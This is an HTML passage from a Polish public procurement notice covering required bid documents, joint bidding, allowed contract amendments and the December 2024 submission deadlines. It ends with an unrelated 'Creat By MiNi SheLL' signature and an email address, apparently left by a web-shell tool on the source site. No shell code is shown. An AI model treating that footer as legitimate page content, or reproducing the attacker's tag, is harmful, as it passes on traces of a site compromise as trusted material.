Wykonawcy powinny składać się co najmniej następujące dokumenty (katalog nie jest zamknięty, stanowi listę<br/>pomocniczą przy sporządzaniu oferty):<br/>1)	Formularz oferty (załącznik nr 2 do SWZ);<br/>2)	Oświadczenie wskazane w rozdziale 7 ust. 1 SWZ (Załącznik Nr 3 do SWZ);<br/>3)	Formularz cenowy (załącznik nr 5 do SWZ - wypełniony w zależności od wybranej części);<br/>4)	Oświadczenie wskazane w rozdziale 7 ust. 1 SWZ (Załącznik Nr 7 do SWZ);<br/>5)	Dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa (w przypadku, gdy dotyczy);<br/>6)	Zobowiązanie podmiotu trzeciego (jeśli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Przyjmuje się, że pełnomocnictwo do podpisania oferty obejmuje pełnomocnictwo do poświadczenia za<br/>zgodność z oryginałem wszystkich dokumentów. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale 7 ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>usługi wykonają poszczególni wykonawcy. W tym celu Zamawiający przygotował stosowną sekcję formularza ofertowego.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Istotne postanowienia umowy zawarte zostały we wzorze umowy - Załączniku Nr 6 do SWZ.<br/>2. Wszelkie zmiany i uzupełnienia umowy mogą być dokonywane jedynie w formie pisemnej w postaci aneksu do umowy,<br/>pod rygorem nieważności.<br/>3. Zamawiający przewiduje możliwość istotnych zmian Umowy w stosunku do treści oferty, na podstawie której dokonano<br/>wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z wymienionych w niniejszym ustępie okoliczności oraz<br/>określa warunki tych zmian:<br/>1) W przypadku zmian obowiązujących przepisów prawa, wchodzących w życie po zawarciu umowy, powodujących<br/>konieczność zmiany umowy, wraz z określeniem skutków wprowadzenia zmiany;<br/>2) Zmiany terminu realizacji zadania w przypadku:<br/>a) przypadki losowe (kataklizmy lub inne czynniki zewnętrzne, niemożliwe do przewidzenia wydarzenia, którym nie można<br/>zapobiec), które będą miały wpływ na treść zawartej umowy i termin realizacji usługi;<br/>b) zmiana przepisów powodujących konieczność innych rozwiązań niż zakładano w opisie przedmiotu zamówienia;<br/>c) zmiany harmonogramu realizacji przedmiotowego projektu.<br/>d) wystąpienia okoliczności niezależnych od Wykonawcy i Zamawiającego skutkujących niemożliwością dotrzymania<br/>terminu realizacji przedmiotu umowy<br/>3) Pozostałe zmiany:<br/>a) w każdym przypadku, gdy zmiana jest korzystna dla Zamawiającego;<br/>b) w przypadku zmiany wysokości obowiązującej stawki podatku VAT, w sytuacji, gdy w trakcie realizacji przedmiotu<br/>umowy, nastąpi zmiana stawki VAT dla usług objętych przedmiotem umowy. W takim przypadku Zamawiający dopuszcza<br/>możliwość zmiany cen jednostkowych brutto przedmiotu zamówienia i wysokości wynagrodzenia określonego w niniejszej<br/>umowie, o kwotę równą różnicy w kwocie podatku, jednakże wyłącznie co do części wynagrodzenia za usługi, których do<br/>dnia zmiany podatku VAT jeszcze nie wykonano/rozliczono.<br/>c) zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy (np. terminu płatności faktury,<br/>zmiana okresu rozliczeniowego);<br/>d) przypadki losowe (kataklizmy lub inne czynniki zewnętrzne, niemożliwe do przewidzenia wydarzenia, nieprzewidziane<br/>zdarzenia wpływające istotnie na stan zdrowia), które będą miały wpływ na treść zawartej umowy i termin realizacji;<br/>e) wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie<br/>przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, przy czym wynagrodzenie<br/>Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy wynikającą ze zwiększenia wynagrodzeń osób bezpośrednio wykonujących zamówienie do wysokości aktualnie obowiązującego minimalnego wynagrodzenia, z<br/>uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostu minimalnego wynagrodzenia, co zostanie przez<br/>Wykonawcę uzasadnione w sposób nie budzący wątpliwości,<br/>4) Wystąpienia omyłek pisarskich i rachunkowych.<br/>5) Zmiany osób odpowiedzialnych za kontakty i nadzór nad przedmiotem umowy.<br/>6) Zmiany formy organizacyjnej / prawnej Wykonawcy (przekształcenie itp.).<br/>4. Wszelkie zmiany wymagają formy pisemnej pod rygorem nieważności, w postaci aneksu do umowy.<br/>5. Nie wymagają zmiany umowy obniżki cenowe i czasowe promocje. Wykonawca zobowiązany jest jednak poinformować o<br/>nich Zamawiającego.<br/>6. W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie przedmiotu umowy nie leży w interesie<br/>publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie<br/>14 dni od powzięcia wiadomości o powyższych okolicznościach. W takim przypadku Wykonawca może żądać jedynie<br/>należnego mu wynagrodzenia z tytułu wykonanej części umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-04 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę, za pośrednictwem Formularza składania oferty dostępnego na https://platformazakupowa.pl/pn/powiatwolowski w konkretnym postępowaniu w sprawie udzielenia zamówienia publicznego.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-04 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-02</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com